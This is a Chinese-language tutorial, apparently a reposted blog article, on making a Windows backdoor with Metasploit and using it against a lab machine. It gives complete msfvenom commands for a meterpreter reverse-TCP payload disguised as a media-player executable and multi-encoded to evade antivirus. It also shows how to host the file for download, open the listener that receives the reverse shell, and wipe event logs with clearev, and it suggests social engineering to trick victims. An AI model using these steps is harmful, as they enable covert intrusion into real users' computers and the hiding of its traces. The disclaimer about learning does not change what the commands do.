本文主要是介绍制作windows客户端恶意软件进行渗透，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

目录

工具

靶机

客户端渗透原理

制作Windows恶意软件获取shell

工具

Metasploit

靶机

windows 2008 r2

相信大多数网友都是下载的虚拟机，所以请设置成桥接模式，确保位于同一网段

注：以下内容仅供学习交流，请勿用于非法用途

客户端渗透原理

在我们无法突破对方的网络边界时，往往需要使用客户端渗透这种方式对目标发起攻击，比如我们向目标发一个含有后门的程序，或者是一个word文档，pdf文件。想要达到效果同时也要利用好社会工程学，来诱惑受害者执行恶意程序。

由于有杀毒软件，所以我们可以利用颜色网站或者免杀来躲避查杀。

免杀可以通过修改二进制特征字符或者进行加密。

制作Windows恶意软件获取shell

msfvenom是msfpayload,msfencode的结合体，可利用msfvenom生成木马程序，并在目标机上执行，在本地监听上线。

生成xx影音.exe后门程序

使用一个编码器

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xx影音1.exe

使用两个编码器进一步加强免杀能力

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe

参数说明

-a 指定架构，如：x86和x64，x86代表32位，x64代表64位。

--platform 指定平台，这里选择windows，通过 --l platforms可以查看所有支持的平台

-p 设置攻击载荷

-b 去掉坏字符，坏字符会影响payload的正常执行

启动apache2

systemctl start apache2

然后后去目标浏览器下载

http://192.168.242.128/xx影音2.exe

会弹出一个下载界面，点击下载打开即可

回到kali启用msf监听

msf6 > use exploit.multi/handler

设置payload

msf6 > set payload windows/meterpreter/reverse_tcp

成功建立会话，进入后可利用getuid查看权限，利用help可查看命令

clearev命令

入侵痕迹擦除

在渗透利用过程中难免留下日志等信息痕迹，使用clearev命令擦除痕迹后再跑。

命令：clearev

这篇关于制作windows客户端恶意软件进行渗透的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！